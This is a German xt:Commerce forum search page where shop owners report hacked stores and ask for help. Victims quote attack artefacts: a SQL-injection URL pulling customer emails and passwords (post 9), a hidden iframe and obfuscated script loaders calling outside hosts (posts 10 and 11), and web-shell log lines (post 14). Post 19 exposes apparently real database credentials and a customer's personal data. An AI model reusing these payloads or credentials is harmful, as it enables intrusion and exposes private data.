Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'gehackt'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 22 results

  1. Hallo, wenn Artikel in der Übersicht oder in der Datailansicht angeklickt werden wir auf andere Seiten umgeleitet, ua. 1000euro Rabatt, Rusische Sexseiten uva. weiss jemand wie ich den Schadcode finde? oder hat erfahrung damit?? mit der Suchfunktion von Notepat++ in der Shopsoftware und Datenbank habe ich (noch) nichts gefunden. wenn alles nichts nutzt - ältere Datensicherung aufspielen - Grüße
  2. Hallo zusammen, TEIL 1: ich wollte heute auf meinen Online Shop gehen und auf einmal kam die Nachricht "attackierende Seite" !!! TEIL 2: Ich bin dann über eine virtuelle Maschine auf meinen Shop gegangen und habe mir sofort einen Trojaner eingefangen! Dann habe ich mir meine index.html usw. angeschaut und finde auch sofort Codes und IFrames ! SIEHE HIER CODE - zu finden in (SHOP\admin\index.php): SIEHE HIER IFRAME in index.html - zu finden in (SHOP\usage\index.html): TEIL 3: Man sieht in dem IFrame die Seite "****" ich bin mit meiner virtuellen Maschine drauf gegangen und siehe da was plötzlich da steht: Ich frage EUCH, kann DAS überhaupt sein???? Der Kerl muss den Text schon länger dort stehen haben... und ich wurde gestern am (7.7.12) gehackt und erst da trat der IFrame auf!!! Kann mir nicht vorstellen das der Typ von nichts weis und so tut als wäre es normal das es über seinen Server läuft ?!?!? 4. Nun meine Fragen... was TUN? Es ist ein Notfall, der Shop hält mich über Wasser! Ich habe ein KOMPLETT Trojanerfreies Backup vom ganzen Shop! Wie gehe ich nun vor? Habe grad ALLE FTP Dateien gelöscht. Sollte ich nun Strato anschreiben und denen sagen das die meinen FTP komplett cleanen sollen und nach shell scripts absuchen sollen oder soetwas, oder ist das hinfällig da ich alles gelöscht habe? Oder sollen die vorallem IHREN SERVER cleanen, es kann ja sein das der gesamte Server gehackt wurde, oder? Wenn soweit von Seiten Strato alles SAUBER ist, kann ich bedenkenlos mein ShopBackup draufladen und den Shop neu hochfahren? 5. Wenn der Shop wieder läuft, wo bekomme ich die besten und neusten Sicherheitsupdates für einen XT COMMERCE 3.0.4 Shop? Suche gerade und finde nichts passendes, BITTE wirklich um hilfe! 6. In einem anderen Thread schrieb jemand, man sollte auf jeden Fall folgende Liste in die ".htaccess" schreiben: # Sperre nach Agent SetEnvIfNoCase user-agent "1337" bad_bot=1 SetEnvIfNoCase user-agent "acont" bad_bot=1 SetEnvIfNoCase user-agent "CatchBot" bad_bot=1 SetEnvIfNoCase user-agent "Daumoa" bad_bot=1 SetEnvIfNoCase user-agent "DomainCrawler" bad_bot=1 SetEnvIfNoCase user-agent "DotBot" bad_bot=1 SetEnvIfNoCase user-agent "DTS Agent" bad_bot=1 SetEnvIfNoCase user-agent "dug-portal" bad_bot=1 SetEnvIfNoCase user-agent "EuripBot" bad_bot=1 SetEnvIfNoCase user-agent "Eurobot" bad_bot=1 SetEnvIfNoCase user-agent "FDM" bad_bot=1 SetEnvIfNoCase user-agent "findlinks" bad_bot=1 SetEnvIfNoCase user-agent "FollowSite" bad_bot=1 SetEnvIfNoCase user-agent "Grub" bad_bot=1 SetEnvIfNoCase user-agent "iCcrawler" bad_bot=1 SetEnvIfNoCase user-agent "JadynAveBot" bad_bot=1 SetEnvIfNoCase user-agent "Java" bad_bot=1 SetEnvIfNoCase user-agent "Jyxobot" bad_bot=1 SetEnvIfNoCase user-agent "libwww" bad_bot=1 SetEnvIfNoCase user-agent "LinkWalker" bad_bot=1 SetEnvIfNoCase user-agent "lmspider" bad_bot=1 SetEnvIfNoCase user-agent "Mechanize" bad_bot=1 SetEnvIfNoCase user-agent "MJ12bot" bad_bot=1 SetEnvIfNoCase user-agent "MLBot" bad_bot=1 SetEnvIfNoCase user-agent "Netluchs" bad_bot=1 SetEnvIfNoCase user-agent "Ocelli" bad_bot=1 SetEnvIfNoCase user-agent "Plonebot" bad_bot=1 SetEnvIfNoCase user-agent "psbot" bad_bot=1 SetEnvIfNoCase user-agent "Rexyobot" bad_bot=1 SetEnvIfNoCase user-agent "ruky" bad_bot=1 SetEnvIfNoCase user-agent "Sapphire" bad_bot=1 SetEnvIfNoCase user-agent "ScoutJet" bad_bot=1 SetEnvIfNoCase user-agent "Seekbot" bad_bot=1 SetEnvIfNoCase user-agent "Speedy Spider" bad_bot=1 SetEnvIfNoCase user-agent "SurveyBot" bad_bot=1 SetEnvIfNoCase user-agent "susie" bad_bot=1 SetEnvIfNoCase user-agent "Toplistbot" bad_bot=1 SetEnvIfNoCase user-agent "Twiceler" bad_bot=1 SetEnvIfNoCase user-agent "Updater" bad_bot=1 SetEnvIfNoCase user-agent "WebDataCentreBot" bad_bot=1 SetEnvIfNoCase user-agent "weive" bad_bot=1 SetEnvIfNoCase user-agent "Yandex" bad_bot=1 SetEnvIfNoCase user-agent "Yanga" bad_bot=1 SetEnvIfNoCase user-agent "Yeti" bad_bot=1 # Sperre nach IP SetEnvIfNoCase remote_addr "^91.98.*" bad_bot=1 # Sperre nach Request SetEnvIfNoCase request_uri "^w00tw00t.*" bad_bot=1 <FilesMatch "(.*)"> Order Allow,Deny Allow from all Deny from env=bad_bot </FilesMatch> Meine Frage wäre nun wie das aussehen würde (habe da keine Ahnung von)?! Erstelle ich eine neue Datei die so heißt und wenn ja, wo wird die im Shop abgelegt? Oder änder ich z.B eine .htacces die im HAUPT-Shop-Ordner liegt? Dort steht gerade folgendes drin: RewriteEngine off DirectoryIndex webalizer.html AuthUserFile /www/htdocs/w0ssdg38e//usage//.htpasswd AuthGroupFile /dev/null AuthName ByPassword AuthType Basic <Limit GET POST> require user w00ba88e </Limit> Würde man die Liste von oben einfach unter das </Limit> kopieren, oder wie muss soetwas dann aussehen? EDIT: 7. Kann ich auch in die htacces reinschreiben das DIREKT Auslands IPs (russland/china) komplett gesperrt werden?? Ist das machbar? Wenn ja, wie? Danke schonmal und ich hoffe mir kann jemand helfen
  3. Hilfe Hilfe Hilfe.... habe gerade eine Bestellung von meinem Shop bekommen, unter meinem Namen!!! Ein Kunde hat bestellt aber es zeigt meinen Namen- Liefadresse und Tel. Email usw. an, jetzt schaue ich unter "Wer ist online" und sehe dauernd meinen Namen aufgelistet mit versch. IP Adressen und unterschiedlichen Warenkörben. Was ist denn da jetzt schief gelaufen? Hat da jemand was gehackt?? Ich habe keine Artikel in den Warenkorb gelegt, und wenn ich ganz normal auf meinen Shop gehe und bin angemeldet erscheinen Artikel die im Warenkorb sind. Bitte helft mir.. was könnte das sein. Danke Steffi
  4. Hallo, unser Shop wurde gehackt und ist derzeit erstmal off - wo finde ich hier denn alle Patche die es so in den letzten zwei Jahren gab? Gruß Jan
  5. wen kann ich anrufen oder kontaktieren wenn mein account schon wieder gehäckt wurde? ist xtcommerce sicher???? was können wir da machen??
  6. Hallo, ich habe im Admin bei wer ist online folgende eintäge gesehen, hier als bild: ich habe in meinem shop keinen ordner buchkatalog angelegt und auch der 3. Eintrag von unten vvb.Sport, damit kann ich nichts anfangen. Ist das normal, oder hat da wirklich jemand unseren shop gehackt? Shopsystem xt:Commerce v3.0.4 SP2.1 Danke im voraus.
  7. Hallo zusammen, vorweg.. Wenn der Betrag hier falsch ist bitte verschieben... Ich habe folgendes Problem. Wenn man auf meinen Webshop geht: # admin # ! Keine Links zu infizierten Seiten ! Bei erneutem Post muss der Account gesperrt werden. Kann mir jemand helfen? ich verzweifle....
  8. Liebe Leute, mein Shop wurde nun schon zum wiederholten Male gehackt. Ich benutze die Version xt:Commerce v3.0.4 SP2.1 mit wie ich meine allen Sicherheitsupdates, die bis Mai 2009 zur Verfügung standen. Gibt es eigentlich so etwas wie eine Mailingliste, auf der das Vorhandensein von Sicherheitspatches publiziert wird? Folgende Symptome: Das Administrator Passwort wurde verändert. Die Addresse des Admin Accounts wurde abgeändert. Gibt es wichtige Sicherheitsupdates aus den letzten 10 Monaten, deren Fehlen zu so einem Angriff führen könnten?
  9. Habe grade meine Counterstatistik durch geschaut und dabei folgenden EIntrag entdeckt: IP 93.174.88.81 Besuchte Seiten 06.02.2010, 16:32:54 /shop_content.php/coID/11/product/Servic... 06.02.2010, 16:33:52 /index.php/coID/-1%27%20union%20all%20se... Da hat jemand versucht Kontodaten auszulesen indem er diese URL aufgerufen hat: index.php/coID/-1%27%20union%20all%20select%20concat(customers_email_address,0x203a20,customers_password)%20from%20customers%20limit%200,1%20union%20select%201%20from%20content_manager%20where%201=%271 Kann mir jemand sagen ob der Typ erfolg beim Auslesen hatte? Habe den Link selbst auch mal aufgerufen, wurde aber nirgends was von den Kontodaten angezeigt. Habe: xt:Commerce v3.0.4 SP2.1 Mache mir nun etwas Sorgen dass der Zugriff auf die Daten meiner Kunden hat... Wäre sehr Dankbar über schnelle Hilfe
  10. Hallo mein Shop wurde gehackt. der Sicherheitspath vom 20.11.2008 3.0.4 für Sp2.1 ist drauf Ich habe bereist die Dateien offline per Antivir / Mailwarebytes geprüft kein Ergebnis. Folenden EIntrag <iframe frameborder="0" onload="if (!this.src){ this.src='http://intelq.ru:8080/index.php'; this.height='0'; this.width='0';}" >crrdwrlcjyvsznsvjhigsarreeiqghb</iframe> wer kann mir weiterhelfen. Gruß Matthias
  11. Hallo zusammen, ich hoffe Ihr habt Weihnachten ruhig und gesund hinter Euch gebracht und könnt mir bei meinem Problem helfen. Anscheinend wurde mein Shop die Nacht gehackt! Ich kann auf meine HP zwar zugreifen, aber sobald ich den Shop aufrufe sehe ich nur das : Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t)p#!!^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e#!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(co!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w00xxxxxx/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095 Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t)p#!!^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e#!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(co!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w008d0f6/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095[/PHP] Da ich mit so etwas noch nie Probleme hatte, stehe ich wie der Ochse vorm Berg. Wie geht man am besten vor? Kann ich diese Eintragungen einfach löschen? Muss ich dabei irgendetwas beachten? Fragen über Fragen .... und dabei habe ich gerade eine fette Rabatt-Aktion laufen und komme an die Daten natürlich nicht ran. Bitte, bitte, ich brauche wirklich dringend Unterstützung. Schon einmal lieben Dank BalmyBeads
  12. Absolute Sch***! Unser Shop wurde gehackt, es kam jemand an die Zugangsdaten und hat die Admin Mail geändert, jetzt kommt niemand mehr rein, was muss jetzt gemacht werden? Bitte schnelle Antwort. !!!
  13. Hallo! Mein Shop wurde gehacked. Dabei wurde die Startseite des Shops durch eine Hackerseite ersetzt. Ausserdem wurde ein neuer "Vendor" in der Datenbank angelegt sowie die PayPal Addresse modifiziert. Ich verwende xt:commerce 3 einem SP (wo kann ich die genaue Version nachsehen?) - die Version, die sehr lange Zeit als stable galt. Ist es tatsächlich so, dass ich mit dieser Sicherheitslücke leben muss solange ich keine weiteren 100 Euro Supportgebühr bezahle? Gibt es derartig wichtige Updates nicht auch für die Community? Es handelt sich um diesen Hack in etwa: http://www.********************************************************.de/shop-server-hacked-basajev-untersucht.php
  14. Hallo! Mein Shop wurde jetzt leider schon mehrmals gehackt. Einmal von "Basayev", wobei dei Startseite ersetzt wurde. Diese Sicherheitslücke hatte offensichtlich irgendwas mit einem Bildupload-Script zu tun: 78.190.70.39 - - [14/Dec/2008:23:01:44 +0100] "GET /images/manufacturers/catalog.php?act=ls&d=%2Fhome%2Fwww%2Fdoc%2F11679%2FMEINEDOMAIN2.com%2Flogs&sort=0a HTTP/1.1" 200 5297 "http://www.MEINEDOMAIN1.de/images/manufacturers/catalog.php?act=ls&d=%2Fhome%2Fwww%2Fdoc%2F11679%2FMEINEDOMAIN1.com&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" Beim jüngsten Hackangriff wurden in mehrere Verzeichnisse php-Dateien hochgeladen, die dann Spam verschicken sollten. Außerdem war im Hauptverzeichnis die shop_content.php verändert. Mein Provider hat mir zur Sicherheitslücke im Shop folgendes geschrieben: das von Ihnen eingesetzte OSCommerce enthält eine Sicherheitslücke. Über diese wurde mehrere PHP-Shells und SPAM-Scripte auf den Account hochgeladen. In folgendem Logfile-Auszug können Sie sehen, inwiefern die Sicherheitslücke ausgenutzt wurde: dial-pool39.lg.starcomms.net - - [30/May/2009:20:25:58 +0200] "POST /shop_content.php/language/en/coID/0?act=ls&d=%2Fhome%2Fwww%2Fdoc%2F11679%2FMEINEDOMAIN.de%2Fwww%2FVERZEICHNIS%2FfUNTERVERZEICHNIS&sort=0a HTTP/1.0" 200 29719 "http://www.MEINEDOMAIN.de/shop_content.php/language/en/coID/0?act=ls&d=%2Fhome%2Fwww%2Fdoc%2F11679%2Fdreadlocks.de%2Fwww%2FVERZEICHNIS%2FUNTERVERZEICHNIS&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" Kann ein schlauer Mensch daraus etwas herauslesen, wo die Sicherheitslücke liegt und/oder weiß sogar, was zu tun ist? Wäre für jeden Hinweis dankbar! Klaus
  15. Hallo, auf meinem Shop waren plötzlich alle Kategorien deaktiviert, ich dachte sofort okay, jemand hat den Shop gehackt. Nun spinnt mein Shop vollkommen rum, in regelmässigen Abständen wird ein Verkauf hinzugefügt, Warenwert von 0 Euro. Es werden immer die Kunden hinzugefügt die sich einmal angemeldet hatten. Nun bin ich etwas verwirrt, denn kein normaler Mensch würde so irrational chaos verursachen? Bitte um möglichst schnelle Hilfe. Mit freundlichen Grüßen
  16. Hallo Leute, hab seit ein paar Wochen ein sehr ernst zu nehmendes Problem: die Artikelmengen und Preise in meinem Webshop ändern sich tagtäglich von selbst, so dass es mir kaum noch möglich ist einen Überblick zu behalten. Hab deswegen auch schon Artikel verkauft, die gar nicht mehr vorrätig waren, was natürlich ganz übel für den Kundenservice ist. Hatte jemand von Euch schon das gleiche Problem? Ist mein Shop vielleicht gehackt worden oder kann es der Server sein? Hab auch schon mein Passwort von Websop und FTP-Server geändert aber leider ohne Erfolg. Wenn das so weiter geht bin ich bald den ganzen Tag damit beschäftigt die Artikelmengen und Preise im Shop zu kontrollieren Ich hoffe, ihr könnt mir helfen.....
  17. Nimbo

    Shop gehackt !

    ich weiss nicht was da passiert ist, wenn ich ein produkt anklicke öffnet sich folgende seite die absolut nichts mit meinem shop zu tun hat : // zur sicherheit entfernt http:jtqjehght.com/cgi-bin/index.cgi?dx gebe ich diese adresse im browser ein, komme ich auf : http:www dumbcasinowomen.com/ wie werde ich das wieder los ????
  18. Hallo, ich habe ein Problem mit meinen beiden Shops. Beide wurden letzte Woche gehackt. Gibt man im Browser die Domain ein, findet man nur noch eine Seite, die die netten Typen hinterlassen haben. Den zweiten Shop habe ich FTPseitig gelöscht und das Backup wieder hochgeladen. Um jetzt im Shop ein neues Passwort für mich als Admin zu vergeben wollte ich mir erst ein vom System generiertes zuschicken lassen, dann habe ich versucht, einen neuen Admin anzulegen (auch hierbei wird das PW zugeschickt). Leider erhalte ich dann folgende Fehlermeldung: Fatal error: Smarty error: unable to write to $compile_dir '/www/htdocs/w00681ca/hunde-traum/templates_c'. Be sure $compile_dir is writable by the web server user. in /www/htdocs/w00681ca/hunde-traum/includes/classes/Smarty_2.6.10/Smarty.class.php on line 1088 Was muss ich ändern, dass ich wieder im Spiel bin?? Über schnelle Hilfe würde ich mich sehr freuen! Danke schon mal... Viele Grüße, Micha
  19. Hallo, Eigendlich wollte ich den Inhalt meiner Boxen anpassen und fand in der PHP Datei diesen Inhalt der mich erheblich beunruhigt: <?php $Databaser = 'ebay'; $server = 'db1099.1und1.de'; // 1Million $dbname = 'db216713594'; // Datenbank $user = 'dbo216713594'; // Name $pass = 'XhMHpPeZ'; // Kennwort $dbhandle = mysql_connect($server, $user, $pass) or die('Server '.$server.', '.$user.', '.$pass.' konnte nicht verbunden werden'); mysql_select_db($dbname, $dbhandle) or die('Datenbank konnte nicht erreicht werden'); /* INSERT INTO `customers` (`customers_id`, `customers_cid`, `create_date`, `customers_vat_id`, `customers_vat_id_status`, `customers_warning`, `customers_status`, `customers_gender`, `customers_firstname`, `customers_lastname`, `customers_dob`, `customers_email_address`, `customers_default_address_id`, `customers_telephone`, `customers_fax`, `customers_password`, `customers_newsletter`, `customers_newsletter_mode`, `member_flag`, `delete_user`, `account_type`, `password_request_key`) VALUES (261, NULL, '20051208000252', '', 0, NULL, 2, '', 'Nicole', 'Runge', '0000-00-00 00:00:00', 'mosi67@t-online.de', 281, '0 20 51 / 80 67 32', '', '74be16979710d4c4e7c6647856088456', '0', '0', '0', '1', 1, '');*/ $sql_query = 'SHOW TABLE STATUS FROM db159412263 like \'customers\''; $sql_query = 'select content_text from content_manager where content_id = 26'; $result=mysql_query($sql_query) or die('Fehler in SQL-Befehl!');; $info = mysql_fetch_array($result); $content=$info['content_text']; echo $content; mysql_close($dbhandle); ?>[/PHP] Ist der Inhalt so normal ? Ich habe vorsichtshalber einfach mal den gesamten Ihnhalt der Datei gelöscht.
  20. Moin! Kaum ist mein shop endlich fertig- da läuft er auch schon nicht mehr... Vorgestern war noch alles in Ordnung, aber als ich mich heute mal wieder einloggen wollte, passierte nichts. Es kam jedes mal die Seite mit "Als Gast anmelden, Neuer Kunde, usw.". Dann hab ich mal versucht, meine Produkte anzusehen: die sind mit einmal aber auch nicht mehr da... Wenn man versucht ein Produnkt aufzurufen, kommt der Hinweis, das der Artikel nicht gefunden wurde! Hab schon in der Datenbank auf dem Server nachgesehen: die Datenbank ist noch da, auch die Beschreibung der Produkte, auch den content (AGB, Lieferzei...) konnte ich finden- aber nichts davon wird angezeigt. Hab schon mit meinem Provider telefoniert, der konnte mir aber auch nicht so richig weiter helfen... Muß ich jetzt alles noch einmal machen??? http://www.milonga-schuhe.de Weiß jemand Rat? Gruß, Olox
  21. hallo zusammen, seit ein paar Tagen, wenn ich bei einem Artikel die "Produktoptionen" über den Adminbereich ändern will werde ich, wenn ich anschließend auf speichern drücke komischerweise auf http://www.digitalmediagmbh.de weitergeleitet und die einstellungen werden nicht übernommen. das sieht mir persönlich ziemlich stark nach irgendeinem hacker-kram aus, anders kann ich mir nicht erklären, wie es zu dieser weiterleitung kommt. ich habe die ordner admin, inc, und includes bereits mit den original dateien ersetzt, sowie die configurationsdateien überprüft aber is hat nichts geholfen, und in der datenbank habe ich auch nichts aufffälliges finden können. hat jemand evtl. schon mal so ein problem gehabt, bzw. kann mir da jemand weiterhelfen? ich benutze version 3.0.3 mfg und im vorraus vielen dank
  22. Hallo, und zwar habe ich folgendes problem wenn ich die seite unseres shops aufrufen will bekomme ich folgende fehlermeldung. Warning: main(/kunden/homepages/11/d148936713/htdocs/includes/header.php): failed to open stream: No such file or directory in /homepages/11/d148936713/htdocs/index.php on line 49 Fatal error: main(): Failed opening required '/kunden/homepages/11/d148936713/htdocs/includes/header.php' (include_path='.:/usr/local/lib/php') in /homepages/11/d148936713/htdocs/index.php on line 49 was ist da passiert ich muss sagen da ich keine ahnung davon habe weiss ich jetzt nicht was ich machen soll und da unser webmaster im urlaub ist ist das noch ein viel gr??eres problem. Es sind aber auch noch bestellungen eigegangen sollte ich die ernst nehmen oder nicht was meint ihr ich weiss ja noch nicht mal seit wann der Shop nicht mehr geht gestern abend ging er noch und ich weiss jez nicht ob die bestellungen auch was mit der Sache zutun haben. Bitte um hilfe. Gru? Lukas
×
×
  • Create New...